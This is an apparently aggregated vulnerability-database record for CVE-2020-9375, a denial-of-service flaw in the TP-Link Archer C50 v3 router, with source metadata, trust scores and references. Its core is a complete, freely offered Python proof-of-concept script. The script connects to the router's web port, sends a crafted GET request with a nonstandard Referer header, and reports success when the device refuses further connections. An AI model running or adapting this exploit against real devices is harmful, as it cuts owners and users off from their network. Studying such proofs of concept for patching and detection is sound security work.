ID

VAR-E-202003-0032


CVE

cve_id:CVE-2020-9375

Trust: 1.5

sources: PACKETSTORM: 156928 // EXPLOIT-DB: 48255

EDB ID

48255


TITLE

TP-Link Archer C50 3 - Denial of Service (PoC) - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 48255

DESCRIPTION

TP-Link Archer C50 3 - Denial of Service (PoC). CVE-2020-9375 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 48255

AFFECTED PRODUCTS

vendor:tp linkmodel:archer c50scope:eqversion:3

Trust: 1.6

vendor:tp linkmodel:archer c50scope:eqversion:v3

Trust: 0.5

sources: PACKETSTORM: 156928 // EXPLOIT-DB: 48255 // EDBNET: 102775

EXPLOIT

# Exploit Title: TP-Link Archer C50 3 - Denial of Service (PoC)
# Date: 2020-01-25
# Exploit Author: thewhiteh4t
# Vendor Homepage: https://www.tp-link.com/
# Version: TP-Link Archer C50 v3 Build 171227
# Tested on: Arch Linux x64
# CVE: CVE-2020-9375
# Description: https://thewhiteh4t.github.io/2020/02/27/CVE-2020-9375-TP-Link-Archer-C50-v3-Denial-of-Service.html

import time
import socket

ip = '192.168.0.1'
port = 80

print('[+] IP : ' + ip)
print('[+] Port : ' + str(port))

for i in range(2):
time.sleep(1)
try:
print('[+] Initializing Socket...')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(5)
print('[!] Connecting to target...')
s.connect((ip, port))
header = 'GET / HTTP/1.1\r\nHost: {}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0\r\nReferer: thewhiteh4t\r\n\r\n'.format(ip)
header = header.encode()
print('[!] Sending Request...')
s.sendall(header)
print('[!] Disconnecting Socket...')
s.close()
if i == 1:
print('[-] Exploit Failed!')
break
except Exception as e:
if 'Connection refused' in str(e):
print('[+] Connection Refused...Exploit Successful!')
break
else:
print('[-] Exploit Failed!')
break

Trust: 1.0

sources: EXPLOIT-DB: 48255

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 48255

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 48255

TYPE

Denial of Service (PoC)

Trust: 1.6

sources: EXPLOIT-DB: 48255 // EDBNET: 102775

TAGS

tag:exploit

Trust: 0.5

tag:remote

Trust: 0.5

tag:web

Trust: 0.5

tag:denial of service

Trust: 0.5

sources: PACKETSTORM: 156928

CREDITS

thewhiteh4t

Trust: 0.6

sources: EXPLOIT-DB: 48255

EXTERNAL IDS

db:NVDid:CVE-2020-9375

Trust: 2.1

db:EXPLOIT-DBid:48255

Trust: 1.6

db:EDBNETid:102775

Trust: 0.6

db:PACKETSTORMid:156928

Trust: 0.5

sources: PACKETSTORM: 156928 // EXPLOIT-DB: 48255 // EDBNET: 102775

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2020-9375

Trust: 1.5

url:https://www.exploit-db.com/exploits/48255/

Trust: 0.6

sources: PACKETSTORM: 156928 // EXPLOIT-DB: 48255 // EDBNET: 102775

SOURCES

db:PACKETSTORMid:156928
db:EXPLOIT-DBid:48255
db:EDBNETid:102775

LAST UPDATE DATE

2022-07-27T09:51:27.623000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:156928date:2020-03-26T14:55:55
db:EXPLOIT-DBid:48255date:2020-03-26T00:00:00
db:EDBNETid:102775date:2020-03-26T00:00:00